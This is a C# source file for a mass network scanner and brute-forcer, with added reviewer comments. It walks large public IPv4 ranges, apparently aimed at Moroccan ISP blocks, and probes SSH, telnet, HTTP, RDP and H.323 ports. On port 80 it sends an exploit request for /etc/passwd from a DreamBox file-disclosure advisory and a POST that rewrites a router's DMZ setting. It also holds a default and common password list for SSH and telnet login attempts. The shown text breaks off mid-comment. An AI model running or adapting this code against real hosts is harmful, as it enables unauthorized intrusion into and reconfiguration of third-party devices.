- using System;
- using System.Collections; //ArrayList
- using System.Collections.Generic;
- using System.IO;
- using System.Linq;
- using System.Text;
- using System.Threading;
- using System.Net.Sockets;
- using System.Net;
- using Tamir.SharpSsh;
- //TODO: http://nion.modprobe.de/blog/archives/704-Exploiting-the-UbiquisysSFR-femtocell-webserver-wsalshttpdmongooseyassl-embedded-webserver.html
- //JA
- namespace sshbruteforcer
- {
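/// <summary>
/// Extension helpers for applying a bit mask to an <see cref="IPAddress"/> and for
/// testing whether an IPv4 address is loopback or in one of the RFC 1918 private ranges.
/// </summary>
public static class IPAddressMask
{
    // 0.0.0.0 is treated as "no address" and never counts as intranet.
    private static readonly IPAddress empty = IPAddress.Parse("0.0.0.0");

    // Each private range is expressed as (network, netmask). An address belongs to the
    // range when (address AND netmask) == network.
    private static readonly IPAddress net10 = IPAddress.Parse("10.0.0.0");        // 10.0.0.0/8
    private static readonly IPAddress mask8 = IPAddress.Parse("255.0.0.0");
    private static readonly IPAddress net172 = IPAddress.Parse("172.16.0.0");     // 172.16.0.0/12
    private static readonly IPAddress mask12 = IPAddress.Parse("255.240.0.0");
    private static readonly IPAddress net192 = IPAddress.Parse("192.168.0.0");    // 192.168.0.0/16
    private static readonly IPAddress mask16 = IPAddress.Parse("255.255.0.0");

    /// <summary>
    /// Extracts the raw bytes of an address and a mask and verifies that both have the
    /// same length (both IPv4 or both IPv6).
    /// </summary>
    /// <exception cref="ArgumentNullException">Either argument is null.</exception>
    /// <exception cref="ArgumentException">The address and the mask differ in length.</exception>
    private static void CheckIPVersion(IPAddress ipAddress, IPAddress mask, out byte[] addressBytes, out byte[] maskBytes)
    {
        // ArgumentNullException derives from ArgumentException, so callers that caught
        // ArgumentException for a null mask keep working.
        if (ipAddress == null)
        {
            throw new ArgumentNullException("ipAddress");
        }
        if (mask == null)
        {
            throw new ArgumentNullException("mask");
        }
        addressBytes = ipAddress.GetAddressBytes();
        maskBytes = mask.GetAddressBytes();
        if (addressBytes.Length != maskBytes.Length)
        {
            throw new ArgumentException("The address and mask don't use the same IP standard");
        }
    }

    /// <summary>
    /// Returns a new address whose bytes are the bitwise AND of the address and the mask.
    /// </summary>
    /// <param name="ipAddress">Address to mask.</param>
    /// <param name="mask">Mask of the same address family.</param>
    /// <returns>The masked address.</returns>
    /// <exception cref="ArgumentException">Null argument or mismatched address families.</exception>
    public static IPAddress And(this IPAddress ipAddress, IPAddress mask)
    {
        byte[] addressBytes;
        byte[] maskBytes;
        CheckIPVersion(ipAddress, mask, out addressBytes, out maskBytes);
        byte[] resultBytes = new byte[addressBytes.Length];
        for (int i = 0; i < addressBytes.Length; ++i)
        {
            resultBytes[i] = (byte)(addressBytes[i] & maskBytes[i]);
        }
        return new IPAddress(resultBytes);
    }

    /// <summary>
    /// Returns true if the address is a loopback address or lies in one of the
    /// IANA-reserved private IPv4 ranges:
    ///   10.0.0.0    - 10.255.255.255
    ///   172.16.0.0  - 172.31.255.255
    ///   192.168.0.0 - 192.168.255.255
    /// 0.0.0.0 and non-loopback IPv6 addresses return false; IPv6 private ranges are
    /// not evaluated here.
    /// </summary>
    /// <param name="ipAddress">Address to classify.</param>
    /// <returns>True for loopback and RFC 1918 addresses, otherwise false.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="ipAddress"/> is null.</exception>
    public static bool IsOnIntranet(this IPAddress ipAddress)
    {
        if (ipAddress == null)
        {
            throw new ArgumentNullException("ipAddress");
        }
        if (empty.Equals(ipAddress))
        {
            return false;
        }
        if (IPAddress.IsLoopback(ipAddress))
        {
            return true;
        }
        // The masks below are IPv4; And() would throw on a 16-byte address.
        if (ipAddress.GetAddressBytes().Length != 4)
        {
            return false;
        }
        // The previous version ANDed the address with the range's *last* address and
        // compared the result with the address itself. That only tests "the address has
        // no bits outside the mask", so public addresses such as 8.8.8.8 (8 & 10 == 8)
        // were classified as private. Compare against the network address instead.
        return ipAddress.And(mask8).Equals(net10)
            || ipAddress.And(mask12).Equals(net172)
            || ipAddress.And(mask16).Equals(net192);
    }
}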
- public class Program //(string ipaddress)
- {
// State of the Program class. In the part of the file shown here, only Max_thread,
// cpt_th, ipaddress and portx are touched by live code; the remaining fields are
// referenced only from commented-out asynchronous-socket code.

// public Socket Sock_scan;
// Receive buffer; not referenced by any live code in the visible part of the file.
static Byte[] m_byBuff = new Byte[32767];
// Throttle threshold: go() blocks when the shared thread counter equals this value.
int Max_thread=50;
private static AsyncCallback callbackProc ;
private static ArrayList m_ListOptions = new ArrayList();
// The values below match the Telnet command codes of RFC 854 (IAC, DO, DONT, WILL,
// WONT, SB, SE). No option negotiation using them is visible in this part of the file.
static Char IAC = Convert.ToChar(255);
static Char DO = Convert.ToChar(253);
static Char DONT = Convert.ToChar(254);
static Char WILL = Convert.ToChar(251);
static Char WONT = Convert.ToChar(252);
static Char SB = Convert.ToChar(250);
static Char SE = Convert.ToChar(240);
// ManualResetEvent instances signal completion.
// (Only waited on inside commented-out asynchronous code in the visible part.)
private static ManualResetEvent connectDone =
    new ManualResetEvent(false);
private static ManualResetEvent sendDone =
    new ManualResetEvent(false);
private static ManualResetEvent receiveDone =
    new ManualResetEvent(false);
// The response from the remote device.
private static String response = String.Empty;
// Counter of running worker threads, shared by every Scanner_ip_port instance.
// Compteur_thread is declared outside the visible part of the file.
public static Compteur_thread cpt_th = new Compteur_thread();
// Set by the constructor; go() does not read either field.
string ipaddress;
int portx;
//public static IPAddress address = IPAddress.Parse("10.20.10.5");
//bool onTheIntranet = address.IsOnIntranet();
/// <summary>
/// Records the two constructor arguments on the instance. Neither value is read by
/// <c>go()</c>, which works from ranges hard-coded in its own body.
/// </summary>
/// <param name="ipaddress">Stored in the <c>ipaddress</c> field.</param>
/// <param name="portx">Stored in the <c>portx</c> field.</param>
public Program(string ipaddress, int portx)
{
    this.portx = portx;
    this.ipaddress = ipaddress;
}
/// <summary>
/// Entry point: builds a <c>Program</c> instance and runs its <c>go()</c> method on a
/// new foreground thread. The constructor arguments ("go", 5) are placeholders; go()
/// does not read them. Command-line arguments are ignored.
/// </summary>
public static void Main(string[] args)
{
    Program runner = new Program("go", 5);
    ThreadStart entryPoint = runner.go;
    Thread worker = new Thread(entryPoint);
    worker.Start();
}
/// <summary>
/// Walks every IPv4 address between a hard-coded start address (s_ip) and end address
/// (s2_ip) and, for each address, starts one thread per port that runs
/// Scanner_ip_port.Scanner_IP_Port: ports Port_start..Port_end (22 and 23), then 80,
/// 443, 1720 and 3389.
///
/// Reviewer notes (defensive reading):
///  - The active range is not limited to a lab or private network; both endpoints are
///    public addresses. Nothing in this method checks authorization or scope, and the
///    IsOnIntranet helper defined in this file is not consulted.
///  - From a sensor's point of view this produces full TCP connects from one source to
///    consecutive destination addresses on a fixed small port set, up to roughly
///    Max_thread connections in flight.
///  - Throttling relies on Monitor.Wait(this) being released by code outside the
///    visible part of the file (presumably the Lancer_Thread handler registered below;
///    confirm against the Compteur_thread class).
///  - Any exception aborts the whole walk and is only printed to the console.
/// </summary>
public void go()
{
    // CScanner_IP s;
    // s = new CScanner_IP("41.250.149.1", "41.250.149.254", 21, 25);
    byte[] t_IP_start;
    byte[] t_IP_end;
    // IPAddress MyExternalIp = GetExternalIp();
    // Console.WriteLine("MyExternalIp=" + MyExternalIp);
    // string[] s_ip = MyExternalIp.ToString().Split('.');
    // string[] s2_ip = MyExternalIp.ToString().Split('.');
    string adresse_en_cours;
    int Port_start=22;
    int Port_end=23;
    // Both thread variables are declared but never assigned by live code in this method.
    Thread th_Lance_Scan;
    Thread th_Scan_ip_port;
    // Subscribes Lancer_Thread (defined outside the visible part) to the counter's event.
    cpt_th.lancer_thread += new Program.Compteur_thread.Lancer_Thread(Lancer_Thread);
    //Split the start IP into octets
    //196.28.249.--- Burkina Faso
    //41.202.193.--- Cameroon
    //195.24.206.--- Cameroon
    //90.4.125.--- France
    //202.152.43.--- Indonesia
    //202.159.126.--- Indonesia
    //http://www.programva.com/en/list-of-ip-addresses-world-countries?user_0=%20Morocco%20MA%20MAR&user_a=ip%20addresses:%20&user_b=list%20of%20ip%20address&id_r=138&opEvent=country&opEventChild=
    //41.214
    // Active start address. The commented-out alternatives below are earlier choices.
    string[] s_ip = { "41", "141", "1", "1" }; //zawi 41.250.195.107
    //string[] s_ip={"41", "250", "75", "1"}; //zawi 41.250.195.107
    //string[] s_ip = { "81", "192", "102", "1" }; //Maroc telecom ip fixe 81.192.102.8: netpeas 81.192.152.205: cnia
    //41.248.0
    //41.248.158.92
    //string[] s_ip = { "41", "141", "235", "1" }; //example: 41.141.235.82
    //41.141.55.16 Agadir
    //41.143.11.192
    //41.250.59.57
    //41.250.118.53
    //41.250.129.142
    //string[] s_ip = { "41", "250", "82", "159" }; //example: 41.250.82.159
    // string[] s_ip = { "196", "12", "232", "1" }; //196.12.232.120 <snip> location
    //196.206.198.10 Rabat
    //string[] s_ip = { "41", "250", "136", "1" }; //<snip> location 41.250.136.238
    //string[] s_ip = { "41", "250", "150", "18" };
    //string[] s_ip = { "41", "250", "195", "1"}; //zawi 41.250.195.107
    //string[] s_ip = { "41", "251", "16", "1" }; //<snip> location 41.251.16.238
    //string[] s_ip = { "91", "121", "78", "55" }; //OVH 91.121.78.55
    //http://www.robtex.com/dns/adsl.iam.net.ma.html#records
    //string[] s_ip = { "196", "217", "240", "1" }; //MENARA (mail)
    //string[] s_ip = { "81", "192", "48", "1" }; //MENARA (dns)
    //string[] s_ip = { "212", "217", "0", "1" }; //MENARA
    t_IP_start = new byte[4];
    // for (int i = 0; i < s_ip.Length; i++)
    // t_IP_start[i] = Convert.ToByte(s_ip[i]);
    t_IP_start[0] = Convert.ToByte(s_ip[0]);
    t_IP_start[1] = Convert.ToByte(s_ip[1]);
    t_IP_start[2] = Convert.ToByte(s_ip[2]);
    t_IP_start[3] = Convert.ToByte(s_ip[3]);
    //t_IP_start[3] = Convert.ToByte("1");
    //string[] s2_ip={"41", "250", "149", "254"}; //zawi
    // string[] s2_ip={"41", "251", "254", "254"}; //zawi
    // Active end address. Its first octet differs from the start address, so the walk
    // crosses many /8 blocks rather than staying inside one network.
    string[] s2_ip = { "196", "12", "233", "255" }; //196.12.232.120 <snip> location
    //string[] s2_ip = { "41", "251", "16", "254" }; //<snip> location 41.251.35.72
    //string[] s2_ip = { "41", "141", "235", "254" }; //<snip> location 41.141.235.82
    //string[] s2_ip = { "91", "121", "78", "55" }; //OVH 91.121.78.55
    // string[] s2_ip = { "41", "250", "150", "19" };
    //string[] s2_ip = { "196", "217", "255", "255" }; //MENARA (mail)
    //string[] s2_ip = { "81", "192", "63", "255" }; //MENARA (dns)
    //string[] s2_ip = { "212", "217", "31", "255" }; //MENARA
    t_IP_end = new byte[4];
    // for (int i = 0; i < s_ip.Length; i++)
    // t_IP_end[i] = Convert.ToByte(s2_ip[i]);
    t_IP_end[0] = Convert.ToByte(s2_ip[0]);
    t_IP_end[1] = Convert.ToByte(s2_ip[1]);
    t_IP_end[2] = Convert.ToByte(s2_ip[2]);
    t_IP_end[3] = Convert.ToByte(s2_ip[3]);
    //t_IP_end[3] = Convert.ToByte("255");
    // private void Lancer_Scan()
    // {
    // i, j, k, l are the four octets of the address currently being generated.
    int i=0, j=0, k=0, l=0;
    int max_j=0, max_k=0, max_l=0;
    // start_* are true only for the first pass through the corresponding inner loop,
    // where the octet begins at the start address instead of 0.
    bool start_j = true;
    bool start_k = true;
    bool start_l = true;
    try
    {
        // Info_Scan infs = new Info_Scan(IP_start, IP_end, Port, "Debut du scan", "");
        //Console.WriteLine("Debut du scan");
        // if(init_scan != null)init_scan(this, infs);
        for(i = t_IP_start[0];i <= t_IP_end[0]; i++)
        {
            // Choose the initial value and upper bound of the second octet.
            if((start_j) && (t_IP_start[0] != t_IP_end[0]))
            {
                j = t_IP_start[1];
                max_j = 255;
            }
            if((start_j) && (t_IP_start[0] == t_IP_end[0]))
            {
                j = t_IP_start[1];
                max_j = t_IP_end[1];
            }
            if((!start_j) && (i != t_IP_end[0]))
            {
                j = 0;
                max_j = 255;
            }
            if((!start_j) && (i == t_IP_end[0]))
            {
                j = 0;
                max_j = t_IP_end[1];
            }
            for( ;j <= max_j; j++)
            {
                // Same selection for the third octet.
                if((start_k) && (t_IP_start[1] != t_IP_end[1]))
                {
                    k = t_IP_start[2];
                    max_k = 255;
                }
                if((start_k) && (t_IP_start[1] == t_IP_end[1]))
                {
                    k = t_IP_start[2];
                    max_k = t_IP_end[2];
                }
                if((!start_k) && (j != t_IP_end[1]))
                {
                    k = 0;
                    max_k = 255;
                }
                if((!start_k) && (j == t_IP_end[1]))
                {
                    k = 0;
                    max_k = t_IP_end[2];
                }
                for( ;k <= max_k; k++)
                {
                    // Same selection for the fourth octet.
                    if((start_l) && (t_IP_start[2] != t_IP_end[2]))
                    {
                        l = t_IP_start[3];
                        max_l = 255;
                    }
                    if((start_l) && (t_IP_start[2] == t_IP_end[2]))
                    {
                        l = t_IP_start[3];
                        max_l = t_IP_end[3];
                    }
                    if((!start_l) && (k != t_IP_end[2]))
                    {
                        l = 0;
                        max_l = 255;
                    }
                    if((!start_l) && (k == t_IP_end[2]))
                    {
                        l = 0;
                        max_l = t_IP_end[3];
                    }
                    for( ;l <= max_l; l++)
                    {
                        adresse_en_cours = i.ToString() + "." + j.ToString() + "." + k.ToString() + "." + l.ToString();
                        // Info_Scan info = new Info_Scan(adresse_en_cours, Port, "starting to scan", "");
                        // Console.WriteLine("DEBUG Current IP: {0}",adresse_en_cours);
                        // if(debut_scan != null)
                        // debut_scan(this, info);
                        /*
                        Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, Port, this, cpt_th);
                        */
                        int nb_thread = 0;
                        // One worker thread per port in Port_start..Port_end (22 and 23).
                        for (int port = Port_start; port <= Port_end; port++)
                        {
                            /*
                            Scanner_IP_Port(adresse_en_cours, port);
                            th_Scan_ip_port = new Thread(new ThreadStart(Scanner_IP_Port));
                            th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
                            th_Scan_ip_port.Start();
                            */
                            Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, port, cpt_th);
                            Thread t = new Thread(new ThreadStart(sc.Scanner_IP_Port));
                            t.Start();
                            cpt_th.Incrementer();
                            nb_thread = 0;
                            cpt_th.Nb_thread(out nb_thread);
                            // Block until something pulses this monitor once the counter
                            // reads exactly Max_thread. The pulse is issued outside the
                            // visible part of the file.
                            if (nb_thread == this.Max_thread)
                            {
                                lock (this)
                                {
                                    // Console.WriteLine("DEBUG WAIT1");
                                    Monitor.Wait(this);
                                }
                            }
                        }
                        // The four blocks below repeat the same start/count/wait sequence
                        // for one fixed port each.
                        //http scan
                        Scanner_ip_port sc2 = new Scanner_ip_port(adresse_en_cours, 80, cpt_th);
                        Thread t2 = new Thread(new ThreadStart(sc2.Scanner_IP_Port));
                        t2.Start();
                        cpt_th.Incrementer();
                        nb_thread = 0;
                        cpt_th.Nb_thread(out nb_thread);
                        if (nb_thread == this.Max_thread)
                        {
                            lock (this)
                            {
                                // Console.WriteLine("DEBUG WAIT2");
                                Monitor.Wait(this);
                            }
                        }
                        //https scan
                        Scanner_ip_port sc3 = new Scanner_ip_port(adresse_en_cours, 443, cpt_th);
                        Thread t3 = new Thread(new ThreadStart(sc3.Scanner_IP_Port));
                        t3.Start();
                        cpt_th.Incrementer();
                        nb_thread = 0;
                        cpt_th.Nb_thread(out nb_thread);
                        if (nb_thread == this.Max_thread)
                        {
                            lock (this)
                            {
                                //Console.WriteLine("DEBUG WAIT2");
                                Monitor.Wait(this);
                            }
                        }
                        //VIDEO H.323 scan : ref.: HD MOORE (Rapid7)
                        Scanner_ip_port sc1720 = new Scanner_ip_port(adresse_en_cours, 1720, cpt_th);
                        Thread t1720 = new Thread(new ThreadStart(sc1720.Scanner_IP_Port));
                        t1720.Start();
                        cpt_th.Incrementer();
                        nb_thread = 0;
                        cpt_th.Nb_thread(out nb_thread);
                        if (nb_thread == this.Max_thread)
                        {
                            lock (this)
                            {
                                //Console.WriteLine("DEBUG WAIT2");
                                Monitor.Wait(this);
                            }
                        }
                        //RDP scan
                        Scanner_ip_port sc3389 = new Scanner_ip_port(adresse_en_cours, 3389, cpt_th);
                        Thread t3389 = new Thread(new ThreadStart(sc3389.Scanner_IP_Port));
                        t3389.Start();
                        cpt_th.Incrementer();
                        nb_thread = 0;
                        cpt_th.Nb_thread(out nb_thread);
                        if (nb_thread == this.Max_thread)
                        {
                            lock (this)
                            {
                                //Console.WriteLine("DEBUG WAIT2");
                                Monitor.Wait(this);
                            }
                        }
                        /*
                        sc.scan_en_cours += new Scanner_IP.Scanner_ip_port.Scan_en_cours(Ev_scan_en_cours);
                        th_Scan_ip_port = new Thread(new ThreadStart(sc.Scanner_IP_Port));
                        th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
                        th_Scan_ip_port.Start();
                        cpt_th.Incrementer();
                        int nb_thread = 0;
                        cpt_th.Nb_thread(out nb_thread);
                        */
                        /*
                        if((this.i_progress == this.pas_a_atteindre) && (this.i_progress <= this._ECART_IP_))
                        {
                        Info_Scan ifs = new Info_Scan(adresse_en_cours, Port, "", "", (int)(this.pct_progress * 100));
                        if(this.maj_prg_bar != null)
                        this.maj_prg_bar(this, ifs);
                        this.pas_a_atteindre += this.pas_progress;
                        }
                        i_progress++;
                        */
                        /*
                        if(nb_thread == this.Max_thread)
                        {
                        lock(this)
                        {
                        Monitor.Wait(this);
                        }
                        if(this.ARRETER_SCAN)
                        {
                        Info_Scan inf_s = new Info_Scan("", 0, "", "Arrêt du scan");
                        if(fin_scan != null)fin_scan(this, inf_s);
                        return;
                        }
                        }
                        */
                    }
                    start_l = false;
                }
                start_k = false;
            }
            start_j = false;
        }
        // Info_Scan inf = new Info_Scan("", 0, "", "Fin du scan");
        // if(fin_scan != null)fin_scan(this, inf);
    }
    catch(Exception e)
    {
        // Catch-all: any failure ends the walk and is reported only on the console.
        Console.WriteLine("BADBOY: "+e.ToString());
    }
    // }
}
/// <summary>
/// Worker for one (address, port) pair. Scanner_IP_Port opens a TCP connection, prints
/// whatever the service sends first, and then acts on the port number:
///   21 / 22 - closes the socket (the follow-up calls are commented out);
///   23      - reads further prompts and hands the banner to telnettry;
///   80      - issues a fixed series of HTTP requests against device-admin paths.
///
/// Reviewer notes (defensive reading):
///  - The port 80 branch is not passive. Besides GET requests for configuration pages
///    it requests /file?file=/etc/passwd (the file-disclosure issue referenced in the
///    comment) and sends a POST to /scdmz.html that would change the DMZ host setting
///    on a device that accepts it without authentication.
///  - In web or device logs, this exact sequence of paths arriving from one client
///    within a short time, without a browser-like set of headers, is a recognizable
///    pattern. Devices answering any of these paths unauthenticated should not have
///    their management interface reachable from the WAN side.
///  - All exceptions are swallowed; a closed port, a timeout and an HTTP error are
///    indistinguishable in the output.
/// </summary>
public class Scanner_ip_port
{
    string adresse_ip;
    int port;
    // Shared running-thread counter; decremented when this worker finishes.
    Compteur_thread cpt_th;
    /// <summary>Stores the address, the port and the shared thread counter.</summary>
    public Scanner_ip_port(string adresse_ip, int port, Compteur_thread cpt_th)
    {
        this.adresse_ip = adresse_ip;
        this.port = port;
        this.cpt_th = cpt_th;
    }
    /// <summary>
    /// Thread body: connect, read the banner, run the per-port follow-up, then decrement
    /// the shared counter (on both the success and the exception path).
    /// </summary>
    public void Scanner_IP_Port()
    {
        try
        {
            // Console.WriteLine("DEBUG SCANNING: " + adresse_ip.ToString());
            IPAddress adresseIP = IPAddress.Parse(adresse_ip);
            IPEndPoint ip = new IPEndPoint(adresseIP, port);
            Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
            //Sock_scan.Blocking = false;
            // Connect to the remote endpoint.
            // Synchronous connect; a refused or unreachable endpoint throws and lands in
            // the catch block at the bottom.
            Sock_scan.Connect(ip);
            /*asynchronous
            try
            {
            Sock_scan.BeginConnect(ip, new AsyncCallback(ConnectCallback), Sock_scan);
            }
            catch (Exception e)
            {
            Console.WriteLine("DEBUG BEGINCONNECT: "+e);
            }
            Console.WriteLine("DEBUG RACHEL");
            connectDone.WaitOne(1000);
            asynchronous*/
            // Info_Scan info = new Info_Scan(adresse_ip, port, "Port ouvert", "", ind, Resultat_Scan.reussite);
            Console.WriteLine("{0} -> Port {1} open", adresse_ip, port);
            // if (scan_en_cours != null) scan_en_cours(this, info);
            /*
            Byte[] RecvBytes = new Byte[256];
            String strRetPage = null;
            Int32 bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
            Encoding ASCII = Encoding.ASCII;
            strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
            while (bytes > 0)
            {
            bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
            strRetPage = ASCII.GetString(RecvBytes, 0, bytes);
            }
            Console.WriteLine(strRetPage);
            */
            byte[] data = new byte[4096];
            string banner;
            int recv;
            /*
            NetworkStream ns = new NetworkStream(Sock_scan);
            if (ns.CanRead)
            {
            recv = ns.Read(data, 0, data.Length);
            stringData = Encoding.ASCII.GetString(data, 0, recv);
            Console.WriteLine("== BANNER START =======================");
            Console.WriteLine(stringData);
            Console.WriteLine("== BANNER END =======================");
            }
            else
            {
            Console.WriteLine("Error: Can't read from this socket");
            ns.Close();
            // server.Close();
            // return;
            }
            */
            // Receive the response from the remote device.
            // NOTE(review): no receive timeout is configured on the socket, so this call
            // blocks until the peer sends data or closes the connection.
            /*synchro*/
            recv = Sock_scan.Receive(data);
            banner = Encoding.ASCII.GetString(data, 0, recv);
            // The banner is concatenated into the format string itself, so braces in
            // remote data are interpreted by Console.WriteLine as format items.
            Console.WriteLine("{0}:{1} -> BANNER01: " + banner, adresse_ip, port);
            if (banner == "")
            {
                recv = Sock_scan.Receive(data);
                banner = Encoding.ASCII.GetString(data, 0, recv);
                Console.WriteLine("{0}:{1} -> BANNER02: " + banner, adresse_ip, port);
            }
            /*synchro*/
            /*asynchro
            Receive(Sock_scan);
            receiveDone.WaitOne(1000);
            // Write the response to the console.
            Console.WriteLine("Response received : {0}", response);
            banner = response;
            asynchro*/
            // Port 21 is never requested by go() in the visible code; the branch is inert there.
            if (port == 21)
            {
                Sock_scan.Close();
                // ftptry(adresse_ip);
            }
            if (port == 22)
            {
                // The credential-guessing call is commented out, so an open port 22 is
                // only reported, not logged into.
                Sock_scan.Close();
                // sshtry(adresse_ip);
            }
            if (port == 23)
            {
                // Keep reading (up to two more times) until the text contains a login or
                // password prompt, or the device's ACL refusal message.
                if (banner.Contains("ogin:") || banner.Contains("assword:") || banner.Contains("Connection was denied by remote host according to ACL!"))
                {
                }
                else
                {
                    recv = Sock_scan.Receive(data);
                    banner = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0}:{1} -> BANNER03: " + banner, adresse_ip, port);
                    if (banner.Contains("ogin:") || banner.Contains("assword:"))
                    {
                    }
                    else
                    {
                        recv = Sock_scan.Receive(data);
                        banner = Encoding.ASCII.GetString(data, 0, recv);
                        Console.WriteLine("{0}:{1} -> BANNER04: " + banner, adresse_ip, port);
                    }
                }
                Sock_scan.Close();
                // A source-address ACL on the telnet service is the one response that
                // stops the follow-up login attempts.
                if (banner.Contains("Connection was denied by remote host according to ACL!"))
                {
                }
                else
                {
                    telnettry(adresse_ip, banner);
                }
            }
            if (port == 80)
            {
                // NOTE(review): the raw socket opened above is not closed in this branch
                // (Close() is only called for ports 21, 22 and 23), and the
                // HttpWebResponse / StreamReader objects below are never disposed.
                string ResponseText = "";
                StreamReader SR = null;
                HttpWebResponse response = null;
                HttpWebRequest request;
                request = (HttpWebRequest)HttpWebRequest.Create("http://"+adresse_ip+"/password.cgi");
                //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
                request.Method = "GET";
                //request.ContentType = "application/xml";
                // GetResponse() throws WebException on 4xx/5xx, which jumps to the outer
                // catch and skips every remaining request for this host.
                response = (HttpWebResponse)request.GetResponse();
                SR = new StreamReader(response.GetResponseStream());
                ResponseText = SR.ReadToEnd();
                Console.WriteLine(string.Format("password.cgi response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
                Console.WriteLine(string.Format("password.cgi response headers : [{0}]", response.Headers.ToString()));
                Console.WriteLine(string.Format("password.cgi response received : [{0}]", ResponseText));
                //***********************************************************************************************************************************************
                //DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit
                //http://www.exploit-db.com/exploits/18079/
                // The log label below says "RFI", but the advisory title above describes a
                // file disclosure (arbitrary file read), not remote file inclusion.
                request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/file?file=/etc/passwd");
                //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
                request.Method = "GET";
                //request.ContentType = "application/xml";
                response = (HttpWebResponse)request.GetResponse();
                SR = new StreamReader(response.GetResponseStream());
                ResponseText = SR.ReadToEnd();
                Console.WriteLine(string.Format("DreamBox RFI response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
                Console.WriteLine(string.Format("DreamBox RFI response headers : [{0}]", response.Headers.ToString()));
                Console.WriteLine(string.Format("DreamBox RFI response received : [{0}]", ResponseText));
                //***********************************************************************************************************************************************
                //108M Wireless ADSL2+ Router
                //http://41.250.9.119/wlcfg.html //Wireless/Basic
                //http://41.250.9.119/wlsecurity.html //Wireless/Security
                request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/wlcfg.html");
                //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
                request.Method = "GET";
                //request.ContentType = "application/xml";
                response = (HttpWebResponse)request.GetResponse();
                SR = new StreamReader(response.GetResponseStream());
                ResponseText = SR.ReadToEnd();
                Console.WriteLine(string.Format("wlcfg.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
                Console.WriteLine(string.Format("wlcfg.html response headers : [{0}]", response.Headers.ToString()));
                Console.WriteLine(string.Format("wlcfg.html response received : [{0}]", ResponseText));
                //***********************************************************************************************************************************************
                request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/wlsecurity.html");
                //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
                request.Method = "GET";
                //request.ContentType = "application/xml";
                response = (HttpWebResponse)request.GetResponse();
                SR = new StreamReader(response.GetResponseStream());
                ResponseText = SR.ReadToEnd();
                Console.WriteLine(string.Format("wlsecurity.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
                Console.WriteLine(string.Format("wlsecurity.html response headers : [{0}]", response.Headers.ToString()));
                Console.WriteLine(string.Format("wlsecurity.html response received : [{0}]", ResponseText));
                //***********************************************************************************************************************************************
                //http://41.250.9.119/scdmz.html //DMZ
                // State-changing request: unlike the GETs above, this POST submits a DMZ
                // host address to the device's configuration page.
                request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/scdmz.html?address=192.168.1.2"); //dmzAddr
                //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
                request.Method = "POST";
                //request.ContentType = "application/xml";
                string postData = "address=192.168.1.2";
                byte[] byteArray = Encoding.UTF8.GetBytes(postData);
                request.ContentLength = byteArray.Length;
                Stream dataStream = request.GetRequestStream();
                dataStream.Write(byteArray, 0, byteArray.Length);
                dataStream.Close();
                response = (HttpWebResponse)request.GetResponse();
                SR = new StreamReader(response.GetResponseStream());
                ResponseText = SR.ReadToEnd();
                Console.WriteLine(string.Format("scdmz.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
                Console.WriteLine(string.Format("scdmz.html response headers : [{0}]", response.Headers.ToString()));
                Console.WriteLine(string.Format("scdmz.html response received : [{0}]", ResponseText));
            }
            // Ports 443, 1720 and 3389 have no branch above: for them the method only
            // reports the open port and the first bytes received.
            cpt_th.Decrementer();
            //Console.WriteLine("End of scan, stop to drink b33rz dude - " + adresse_ip.ToString());
        }
        catch (Exception e)
        {
            /*
            Info_Scan info = new Info_Scan(adresse_ip, port, "Closed Port", "", ind, Resultat_Scan.echec);
            if (scan_en_cours != null) scan_en_cours(this, info);
            */
            // Every failure is treated as "port closed" and discarded; e is unused.
            cpt_th.Decrementer();
            // Console.WriteLine("DEBUG {0} -> Port {1} closed", adresse_ip, port);
            // Console.WriteLine("EXCEPT: " + e);
        }
    }
}
// Candidate passwords tried in order by sshtry (and presumably by telnettry, whose
// body continues beyond the visible part of the file). The list mixes vendor and
// ISP default credentials with entries from a published "most common passwords"
// article, plus the empty string.
//
// Defensive reading: a management interface that still accepts any entry here is
// running with a factory-default or trivially guessable password. These values
// belong on a deny-list for password-change forms and in audits of deployed CPE.
static List<string> passwords = new List<string>
{
    "admin",
    "1234",
    "cisco",
    "",
    "Admin",
    "root",
    "toor",
    "default",
    "azerty",
    "qwerty",
    "12345",
    "123456",
    "1234567",
    "12345678",
    "dreambox",
    "test",
    "user",
    "demo",
    "ZXDSL",
    "password",
    "agadir",
    "menara",
    "Menara",
    "maroc",
    "vodafone",
    "epicrouter", //conexant telnet
    //http://www.itscolumn.com/2011/11/25-password-that-you-should-not-use-not-for-any-accounts/
    "abc123",
    "monkey",
    "letmein",
    "trustno1",
    "dragon",
    "baseball",
    "111111",
    "iloveyou",
    "master",
    "sunshine",
    "ashley",
    "bailey",
    "passw0rd",
    "shadow",
    "123123",
    "654321",
    "superman",
    "qazwsx",
    "michael",
    "football"
    //123123
};
/// <summary>
/// Attempts an SSH password login as "root" on <paramref name="myip"/> once for every
/// entry in the passwords list, using Tamir.SharpSsh's SshStream, and prints the
